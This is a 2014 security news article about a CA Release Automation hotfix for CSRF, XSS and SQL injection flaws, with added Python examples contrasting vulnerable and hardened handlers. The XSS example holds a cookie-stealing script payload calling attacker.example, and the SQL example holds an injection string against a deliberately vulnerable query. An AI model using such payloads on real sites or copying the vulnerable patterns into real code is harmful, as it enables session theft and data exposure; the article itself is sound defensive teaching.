CA Release Automation gets Hotfix

Wednesday, December 17, 2014 @ 04:12 PM gHale


CA Technologies, one of the biggest independent software companies, issued a hotfix to address three vulnerabilities affecting CA Release Automation.

CA Release Automation, formerly known as CA LISA Release Automation, is an enterprise-class, continuous delivery solution that automates complex, multi-tier release deployments. The software helps speed up application release cycles, achieve higher quality releases, and reduce application deployment costs.


According to an advisory published on Monday by CA Technologies and the CERT Coordination Center (CERT/CC) at Carnegie Mellon University, the vulnerabilities affect CA Release Automation 4.7.1 Build 413 and earlier running on Windows, Linux and Solaris. CA addressed the issues in CA Release Automation 4.7.1 Build 448.

The first vulnerability, a cross-site request forgery (CSRF) issue, was reported jointly by Lukasz Plonka and Julian Horoszkiewicz. An attacker can exploit the flaw (CVE-2014-8246) to perform actions on an affected system with the permissions of the targeted user. For the attack to work, the targeted user must be authenticated to the application and must have an active session at the time the forged request is submitted.
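The precondition above is the defining property of CSRF: the victim's browser attaches the session cookie to any request, including one built by a third-party page, so a handler that trusts the cookie alone will carry out the attacker's action. The block below is an added, generic illustration and is not CA's code; the in-memory session store, the endpoint and the user names are constructed for the example. It contrasts a handler that only checks the cookie with one that also demands a per-session synchronizer token that a cross-site page cannot read.

```python
import hmac
import secrets

# Constructed in-memory session store: session_id -> {"user": ..., "csrf": ...}
SESSIONS = {}


def login(user):
    """Create a session and bind a fresh random CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the server embeds in forms it renders for this session."""
    return SESSIONS[sid]["csrf"]


def handle_vulnerable(cookies, form):
    """Hypothetical state-changing endpoint that trusts the session cookie alone."""
    session = SESSIONS.get(cookies.get("SESSIONID"))
    if session is None:
        return 401, "not logged in"
    return 200, f"action {form['action']} executed as {session['user']}"


def handle_hardened(cookies, form):
    """Same endpoint, but the request must also carry the session's CSRF token.

    The cookie is sent automatically by the browser, so it says nothing about
    who constructed the request; only the token from a page the user actually
    loaded from this origin does. compare_digest avoids timing leaks.
    """
    session = SESSIONS.get(cookies.get("SESSIONID"))
    if session is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "csrf token missing or invalid"
    return 200, f"action {form['action']} executed as {session['user']}"


def demo():
    """Returns status codes: (vulnerable/forged, hardened/forged, hardened/legitimate)."""
    sid = login("alice")
    cookies = {"SESSIONID": sid}          # what the victim's browser attaches
    forged = {"action": "deploy"}         # built by a cross-site page: no token
    legit = {"action": "deploy", "csrf_token": csrf_token_for(sid)}
    return (handle_vulnerable(cookies, forged)[0],
            handle_hardened(cookies, forged)[0],
            handle_hardened(cookies, legit)[0])


if __name__ == "__main__":
    print(demo())
```

The forged request succeeds against the first handler purely because the victim is logged in, which is the condition the advisory describes; the hardened handler rejects it while still accepting the same action when it comes from a page that embedded the token.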

Another security hole reported by Horoszkiewicz is a cross-site scripting (XSS) bug. The flaw (CVE-2014-8247) is in a server exception message, CERT/CC said, so attacker-influenced text in that message can reach a victim's browser as markup rather than as plain text.
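An exception message is an easy place to overlook, because it is usually built from whatever input caused the failure and then dropped straight into an error page. The following added example is generic and not the CA code; the handler, the parameter name and the payload are constructed. It shows the same error page rendered with and without output encoding of the exception text.

```python
import html


def error_page_vulnerable(exc):
    """Exception text inserted into the markup as-is."""
    return f"<html><body><h1>Error</h1><pre>{exc}</pre></body></html>"


def error_page_hardened(exc):
    """Exception text HTML-encoded before it is placed in the page body."""
    return f"<html><body><h1>Error</h1><pre>{html.escape(str(exc))}</pre></body></html>"


def handle_request(release_id, renderer):
    """Hypothetical handler: a bad parameter raises, and its value ends up in the message."""
    try:
        if not release_id.isdigit():
            raise ValueError(f"invalid release id: {release_id}")
        return "<html><body>release ok</body></html>"
    except ValueError as exc:
        return renderer(exc)


def demo():
    """Returns whether a script tag survives into each rendered error page."""
    # Constructed payload a victim could be lured into requesting via a link.
    payload = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
    vulnerable = handle_request(payload, error_page_vulnerable)
    hardened = handle_request(payload, error_page_hardened)
    return "<script>" in vulnerable, "<script>" in hardened


if __name__ == "__main__":
    print(demo())
```

The only difference between the two renderers is `html.escape`; the exception text itself is unchanged, which is why the fix belongs at the point where the message is written into the response rather than where it is raised.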

The third vulnerability, identified and reported by Plonka, is an SQL injection flaw (CVE-2014-8248). An attacker holding a non-privileged account can exploit it with a specially crafted query to access sensitive information.
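The significant detail is that a low-privilege account suffices: an injection lets the attacker's input rewrite the part of the query that was supposed to restrict results to that account. The block below is an added illustration using an in-memory SQLite database, not CA's code; the table, rows and payload are constructed. It runs the same lookup through a string-built query and through a parameterised one.

```python
import sqlite3


def make_db():
    """Constructed sample database: release records owned by different users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE releases (id INTEGER, owner TEXT, name TEXT, notes TEXT)")
    db.executemany("INSERT INTO releases VALUES (?, ?, ?, ?)", [
        (1, "alice", "billing-2.3", "deploy notes include a production DB password"),
        (2, "bob", "frontend-1.0", "nothing sensitive"),
    ])
    return db


def releases_vulnerable(db, owner, name):
    """String-built query: the owner filter can be bypassed by crafted input.

    With name = "x' OR '1'='1" the WHERE clause becomes
        owner = 'bob' AND name = 'x' OR '1'='1'
    and AND binds tighter than OR, so every row matches.
    """
    sql = (f"SELECT id, owner, name, notes FROM releases "
           f"WHERE owner = '{owner}' AND name = '{name}'")
    return db.execute(sql).fetchall()


def releases_hardened(db, owner, name):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT id, owner, name, notes FROM releases WHERE owner = ? AND name = ?"
    return db.execute(sql, (owner, name)).fetchall()


def demo():
    """Returns (rows leaked to the vulnerable query, rows returned by the safe one)."""
    db = make_db()
    payload = "x' OR '1'='1"   # constructed payload submitted by low-privilege user bob
    leaked = releases_vulnerable(db, "bob", payload)
    safe = releases_hardened(db, "bob", payload)
    return len(leaked), len(safe)


if __name__ == "__main__":
    print(demo())
```

The vulnerable lookup returns alice's record to bob even though the query text names bob as the owner; the parameterised version returns nothing, because no release is literally named `x' OR '1'='1`. Database-level privileges do not help here: both queries run as the same application account.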

CA Technologies advises customers to check whether their installation is affected by opening the “About Automation Studio” page in Release Automation. If the version shown is older than 4.7.1.448, the hotfix should be applied.
